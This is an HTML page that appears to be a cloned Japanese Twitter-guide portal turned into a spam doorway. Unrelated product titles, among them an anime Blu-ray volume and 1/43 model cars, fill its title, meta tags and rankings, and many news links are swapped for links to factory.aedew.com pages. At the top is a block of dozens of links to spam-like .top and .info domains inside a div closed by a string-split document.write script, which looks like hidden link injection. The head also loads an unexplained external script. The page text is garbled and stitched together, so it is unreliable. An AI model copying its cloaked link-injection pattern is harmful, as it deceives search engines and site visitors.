<a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a>
<a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a>
<a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a>
<a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a>
<a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a>
<a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a>
<a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a>
<a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a>
<a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a>
<a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a>
<a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a>
<a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a>
<a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a>
<a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a>
<a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a>
<a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a>
<a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a>
<a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a>
<a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a>
<a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a>
<a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a>
<a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a>
<a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a>
<a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a>
<a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a>
<a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a>
<a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a>
<a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a>
<a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a>
<a class="z7z8z9z6" href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a>
<a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a>
<a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a>
<script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script>
<!DOCTYPE html>
<html lang="ja">
<head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#">
<meta charset="UTF-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</title>
<meta name="description" content="BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
,1/43 トヨタソアラ 2.0GTツインターボ L (GZ20) グレーメタリック[MARK43],1/43 トヨタソアラ 2.0GTツインターボ L (GZ20) シルキーエレガントトーンニング[MARK43]" />
<meta name="keywords" content="BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
" />
<meta name="robots" content="noydir" />
<meta name="robots" content="noodp" />
<meta name="robots" content="index,follow" />
<script type="text/javascript" src="./thebey03.js"></script>p-16732.html"
<meta property="og:title" content="BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
" /><meta property="og:description" content="1/43 トヨタソアラ 2.0GTツインターボ L (GZ20) スーパーホワイトII[MARK43],BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
" /><meta property="og:type" content="website" />
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
">
<meta name="twitter:title" content="BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
">
<meta name="twitter:description" content="1/43 ダットサン フェアレディ2000(SR311) スポーツホイール ホワイト[MARK43],BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
">
<link rel="index" href="/" />
<link rel="stylesheet" type="text/css" href="http://twinavi.jp/css/style_dante.css?1450773495" /><!--[if lt IE 9]>
<link rel="stylesheet" type="text/css" href="/css/style_dante_ie.css?1450773495" /><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body id="homepage">
<header id="pageheader" class="contents xsmall">
<h1 class="light">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</h1>
<ul id="header-links">
<li class="inline"><a href="" class="mark-arrow">ヘルプ</a></li>
</ul>
<div id="globalnav-signin" class="off">
<a href="" class="block" onClick="_gaq.push(['_trackEvent','LoginButton_PC','click','Global']);"><span class="bold">Twitter</span>でログイン</a>
</div>
<a href="" class="logo altimg logo-home" title="BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</a>
</header>
<!-- global navi -->
<div id="globalnav" class="wrapper"><div class="contents">
<nav><ul>
<li><a href="./index.html" class="column gn-home"><span class="altimg ic-home">ホーム</span></a></li>
<li><a href="" class="column">話題</a></li>
<li><a href="" class="column">アカウント</a></li>
<li><a href="" class="column">まとめ</a></li>
<li><a href="" class="column">インタビュー</a></li>
<li><a href="https://twitter.com/" class="column"><span class="altimg ic-new">NEW!!</span>ツイッター検索</a></li>
<li><a href="" class="column">ツイッターガイド</a></li>
</ul><div class="clearfix"></div></nav>
<div id="gn-search">
<form id="globalnav-search" method="GET" action="/search2/">
<input type="text" name="keyword" value="" placeholder="アカウントや記事やツイートを検索!" class="formtext" maxlength="60"/><input type="hidden" name="ref" value="searchbox"/><input type="image" src="http://twinavi.jp/img/dante/btn_search.png" value="検索する" />
</form>
</div>
</div></div>
<!-- //global navi -->
<!-- local navi -->
<!-- //local navi -->
<!-- MAIN CONTENTS -->
<div id="pagewrapper" class="contents">
<div class="column main">
<div class="section">
<h1 class="xsmall label orange column">HOTワード</h1>
<ul class="giftext icon-l" style="margin-left:75px">
<li class="inline"><a href="" class="txt-inline">おすすめ映画</a></li>
<li class="inline"><a href="" class="txt-inline">注目ニュース</a></li>
<li class="inline"><a href="" class="txt-inline">ツイッター検索</a></li>
<li class="inline"><a href="" class="txt-inline">オモシロ画像</a></li>
</ul>
</div>
<section id="home-article" class="section">
<header class="section-title navi">
<h1 class="small"><a href="" style="color:#333">話題</a></h1>
<div class="home-buzzcategory">
<ul>
<li class="li-tab"><a id="tab-pickup" class="tab-selector-article tab s xsmall on">ピックアップ</a></li>
<li class="li-tab"><a id="tab-news" class="tab-selector-article tab s xsmall">ニュース</a></li>
<li class="li-tab"><a id="tab-tidbits" class="tab-selector-article tab s xsmall">オモシロ</a></li>
<li class="li-tab"><a id="tab-lifestyle" class="tab-selector-article tab s xsmall">ライフスタイル</a></li>
<li class="li-tab"><a id="tab-entertainment" class="tab-selector-article tab s xsmall">エンタメ</a></li>
<li class="li-tab"><a id="tab-it" class="tab-selector-article tab s xsmall">IT</a></li>
<li class="li-tab"><a id="tab-culture" class="tab-selector-article tab s xsmall">カルチャー</a></li>
<li class="li-tab"><a id="tab-sports" class="tab-selector-article tab s xsmall">スポーツ</a></li>
</ul>
<div class="clearfix"></div>
</div>
</header>
<div id="tab-pickup-content-article" class="tab-content tab-content-article on">
<div class="section-body">
<div class="column home-buzzimage">
<a href="" class="block"><img src="" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<ul class="list-article">
<li class="home-buzzlink dotted"><a href="http://factory.aedew.com/images/Chershire/02021941863fx.html">http://factory.aedew.com/images/Chershire/02021941863fx.html</a></li>
<li class="home-buzzlink dotted"><a href="http://factory.aedew.com/images/Chershire/02021708609en.html">http://factory.aedew.com/images/Chershire/02021708609en.html</a></li>
<li class="home-buzzlink dotted"><a href="http://factory.aedew.com/images/Chershire/02021902720wn.html">http://factory.aedew.com/images/Chershire/02021902720wn.html</a></li>
<li class="home-buzzlink dotted"><a href="" class="">サウジ、イランと外交関係断絶 大使館襲撃受け</a></li>
</ul>
<a href="" class="xsmall">【一覧へ】</a>
</div>
</div>
</div>
</section>
<!-- TWINAVI NEWS -->
<section id="home-news" class="section">
<h1 class="section-title small navi"><a href="">ツイナビのおすすめ</a></h1>
<div class="">
<ul>
<li class="column home-news-box home-news-box0">
<span class="column icon-m">
<a href="http://twinavi.jp/topics/culture/55c5bc46-19f0-4ba7-a2c5-3812ac133a21"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/09/aekanaru-fig3.jpg" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
,1/43 ダットサン フェアレディ2000(SR311) スポーツホイール レッド[MARK43]</a>
</span>
</li>
<li class="column home-news-box home-news-box1">
<span class="column icon-m">
<a href=""><img src="" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="">ツイッター、ルールとポリシーを改定 プライバシー保護と、攻撃的行為の禁止をより明確に</a>
</span>
</li>
<div class="clearfix"></div>
<li class="column home-news-box home-news-box2">
<span class="column icon-m">
<a href=""><img src="" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="http://factory.aedew.com/images/Chershire/02021916427fd.html">http://factory.aedew.com/images/Chershire/02021916427fd.html</a>
</span>
</li>
<li class="column home-news-box home-news-box3">
<span class="column icon-m">
<a href=""><img src="" class="article-thumbnail" alt="" /></a>
</span>
<span class="giftext icon-m small">
<a href="">大雪・台風・災害・交通・ライフラインの情報リンク集</a>
</span>
</li>
</ul>
<div class="clearfix"></div>
</div>
</section>
<!-- //TWINAVI NEWS -->
<div class="column main-right">
<section id="home-accountranking" class="section">
<h1 class="section-title navi small"><a href="">ツイッター人気アカウント・ランキング</a></h1>
<span class="caution uptime xxsmall">1/4更新</span>
<div class="home-accountcategory tabwrapper s">
<ul>
<li class="li-tab"><a id="tab-account1" class="tab-selector-account tab s xsmall on">総合</a></li>
<li class="li-tab"><a id="tab-account2" class="tab-selector-account tab s xsmall">有名人・芸能人</a></li>
<li class="li-tab"><a id="tab-account3" class="tab-selector-account tab s xsmall">おもしろ系</a></li>
<li class="li-tab"><a id="tab-account4" class="tab-selector-account tab s xsmall">ミュージシャン</a></li>
<li class="li-tab"><a id="tab-account5" class="tab-selector-account tab last s xsmall">お笑い</a></li>
</ul>
<div class="clearfix"></div>
</div>
<div id="tab-account1-content-account" class="tab-content tab-content-account on">
<div class="section-body">
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank1">1</span>
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon l" />
</span>
<span class="xsmall">GACKT</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank2">2</span>
<img src="http://pbs.twimg.com/profile_images/583313979763617792/SnAobnzc_bigger.jpg" alt="小沢一敬" class="icon l" />
</span>
<span class="xsmall">小沢一敬</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank3">3</span>
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon l" />
</span>
<span class="xsmall">SHOPLIST</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank4">4</span>
<img src="http://pbs.twimg.com/profile_images/667352898687205377/7zMXkcFD_bigger.jpg" alt="西内まりや" class="icon l" />
</span>
<span class="xsmall">西内まりや</span></a>
</div>
<div class="column icon-l centered">
<a href="">
<span class="rankimage">
<span class="rank rank5">5</span>
<img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon l" />
</span>
<span class="xsmall">ショップ...</span></a>
</div>
<div class="clearfix"></div>
</div>
<div class="section-footer endline">
<a href="" class="link-more">1/43 ダットサン フェアレディ2000(SR311) スポーツホイール ライトグレーメタリック[MARK43]</a>
</div>
</div>
<section id="home-articleranking" class="section">
<h1 class="section-title small navi"><a href="/topics">話題アクセスランキング</a></h1>
<div class="section-body">
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://api.rethumb.com/v1/width/500/http://news.tv-asahi.co.jp/articles_img/000054140_640.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ニュース</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021719388nk.html">http://factory.aedew.com/images/Chershire/02021719388nk.html</a></li>
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021707686zo.html">http://factory.aedew.com/images/Chershire/02021707686zo.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>1/43 ダットサン フェアレディ2000(SR311) スポーツホイール イエロー[MARK43]</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://natalie.mu/media/comic/1502/0212/extra/news_xlarge_majicalo.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="http://twinavi.jp/topics/entertainment#topics-ranking">エンタメ</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>新鋭・鈍速毎日が描く熱血魔法少女アクション...</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>1/43 トヨタ スプリンター トレノ N2 1985 カローラ/スプリンター グランドカップ #36 トムス?スプリンター 星野薫[ENIF],BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</a></li>
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021807829pc.html">http://factory.aedew.com/images/Chershire/02021807829pc.html</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://pbs.twimg.com/media/CXxje1GUMAAo8pE.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">オモシロ</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>ピントと写真の関係性について。</a></li>
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021719531kd.html">http://factory.aedew.com/images/Chershire/02021719531kd.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>子供たちにかかわるすべての大人たちへ。さま...</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="/topics/lifestyle/560bcdc1-aa20-49c0-aa74-6230ac133a21" class="block"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/11/tweet-alt-pic.png" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">ライフスタイル</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021940501qa.html">http://factory.aedew.com/images/Chershire/02021940501qa.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>母が不幸なのはわたしのせいではない。わたし...</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>1/43 いすゞ ベレット GT タイプR (PR91W) マグノリアホワイト[MARK43]《07月予約※暫定》</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="/img/topics/thumbnail/internetcom.gif?1450773495" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">IT</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>Google カレンダーのデータを Excel にエクス...</a></li>
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021839219he.html">http://factory.aedew.com/images/Chershire/02021839219he.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>家族で使いやすいLINEスタンプ登場--「洗濯し...</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://www.gizmodo.jp/images/2015/12/151225arcticwinter.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">カルチャー</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>1/43 いすゞ ベレット GT タイプR (PR91W) マダーレッド[MARK43]</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>海の上はハードル高すぎた…SpaceX、ついに地...</a></li>
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021859443aq.html">http://factory.aedew.com/images/Chershire/02021859443aq.html</a></li>
</ol>
</div>
<div class="clearfix"></div>
<div class="column home-buzzimage">
<a href="" class="block"><img src="http://f.image.geki.jp/data/image/news/2560/154000/153676/news_153676_1.jpg" class="article-thumbnail" alt="" /></a>
</div>
<div class="home-buzzlinks">
<h2 class="small"><a href="">スポーツ</a>:</h2>
<ol class="home-rankinglist">
<li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>徳島がDF村松の契約満了を発表</a></li>
<li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021933896oa.html">http://factory.aedew.com/images/Chershire/02021933896oa.html</a></li>
<li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>「彼らは素晴らしい選手」個性磨いた神奈川県...</a></li>
</ol>
</div>
<div class="clearfix"></div>
</div>
</section>
<section id="home-faq" class="section">
<h1 class="section-title small navi"><a href="">Twitter使い方ガイド よくある質問アクセスランキング</a></h1>
<div class="section-body">
<ol>
<li class="small list-l lined"><a href="http://factory.aedew.com/images/Chershire/02021708984sx.html">http://factory.aedew.com/images/Chershire/02021708984sx.html</a></li>
<li class="small list-l lined"><a href="" class="ranking"><span class="rank rank2">2</span>自分のツイートを削除するにはどうしたらいいですか?</a></li>
<li class="small list-l lined"><a href="" class="ranking"><span class="rank rank3">3</span>1/43 いすゞ ベレット GT タイプR (PR91W) メープルオレンジ[MARK43]《発売済?在庫品》</a></li>
</ol>
</div>
<div class="section-footer">
<a href="" class="link-more">もっと知りたい!「Twitter使い方ガイド」</a>
</div>
</section>
</div>
</div>
<aside class="column sub">
<section id="twinavi-tweet" class="section">
<h1 class="section-title small">最新のツイナビツイート</h1>
<div class="section-body">
<p class="small">【話題のツイート】私が「♪お手〜伝いロボ♪ 緊急出動〜♪」って歌えば、子供達は… <a rel="nofollow" target="_blank" href="">1/43 日産 プレジデント(JHG50) ブラック[MARK43]《08月予約》</a></p>
</div>
<div class="follow_sidebar follow_twitter">
<span class="altimg hukidashi"></span>
<div class="column">
<a href="" title="ツイナビのTwitterアカウント" class="altimg icon m ic-twinavi">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
<</a>
</div>
<div class="giftext icon-m">
<a href="" title="ツイナビのTwitterアカウント" class="small">Twitterの最新情報をチェックしよう!</a>
<a href="https://twitter.com/" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="true">をフォロー</a>
</div>
<div class="clearfix"></div>
</div>
</section>
<section id="facebook" class="section">
<p class="small">Facebook</p>
<div class="follow_fb"><div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="55" data-show-faces="false"></div></div>
</section>
<section id="home-side-account" class="section">
<h1 class="section-title small sub"><a href="">有名アカウントを探す</a></h1>
<div class="section-body-sub">
<ul>
<li>
<a href="" class="lined all block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
総合<br />
<span class="num mute xsmall">71,071人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
有名人・芸能人<br />
<span class="num mute xsmall">2,867人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="タワーレコード川崎店(通称:タワ崎)" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
エンタメ<br />
<span class="num mute xsmall">3,226人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
<span style="letter-spacing:-2px">くらし・おでかけ</span><br />
<span class="num mute xsmall">6,128人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
メディア<br />
<span class="num mute xsmall">2,639人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="旭川市旭山動物園[公式]" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
社会・政治<br />
<span class="num mute xsmall">886人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="所英男" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
スポーツ<br />
<span class="num mute xsmall">1,080人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ビジネス・経済<br />
<span class="num mute xsmall">2,996人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
サービス<br />
<span class="num mute xsmall">3,871人</span>
</span>
</a>
</li>
</ul>
<div class="clearfix"></div>
</div>
</section>
<section class="section">
<h1 class="section-title small sub"><a href="">ツイッター使い方ガイド</a></h1>
<div class="section-body-sub">
<ul>
<li class="small dotted lined"><a href="http://factory.aedew.com/images/Chershire/02021717108ml.html">http://factory.aedew.com/images/Chershire/02021717108ml.html</a></li>
<li class="small dotted lined"><a href="">基本的な使い方</a></li>
<li class="small dotted lined"><a href="http://factory.aedew.com/images/Chershire/02021823977hh.html">http://factory.aedew.com/images/Chershire/02021823977hh.html</a></li>
<li class="small dotted lined"><a href="">FAQ よくある質問</a></li>
<li class="small dotted lined last" last><a href="">用語集</a></li>
</ul>
</div>
</section>
<div class="section section-fbwidget">
<div class="section-title small sub">Facebook</div>
<div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</div>
</div>
</aside>
<div class="clearfix"></div>
<nav class="contents">
<br />
<a href="" class="link-top absright">ページの上部へ</a>
</nav>
</div>
<footer id="pagefooter" class="wrapper">
<div class="contents">
<nav>
<ul id="sitemap">
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話題</a></span>
<ul>
<li><a href="http://factory.aedew.com/images/Chershire/02021834397vt.html">http://factory.aedew.com/images/Chershire/02021834397vt.html</a></li>
<li><a href="">ニュース</a></li>
<li><a href="">オモシロ</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021725326ku.html">http://factory.aedew.com/images/Chershire/02021725326ku.html</a></li>
<li><a href="">エンタメ</a></li>
<li><a href="">IT</a></li>
<li><a href="">カルチャー</a></li>
<li><a href="">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</a></li>
<li><a href="">お知らせ</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-matome">まとめ</a></span>
<ul>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">コミック・アニメ</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a></li>
<li><a href="">映画</a></li>
<li><a href="" class="div-inner small on">TV番組</a></li>
<li><a href="">芸能(海外)</a></li>
<li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">芸能(国内)</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">プロ野球</a></li>
<li><a href="">Jリーグ</a></li>
<li><a href="">スポーツ選手</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ガジェット</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021944378bm.html">http://factory.aedew.com/images/Chershire/02021944378bm.html</a></li>
<li><a href="">政治</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021742114zv.html">http://factory.aedew.com/images/Chershire/02021742114zv.html</a></li>
<li><a href="">IT</a></li>
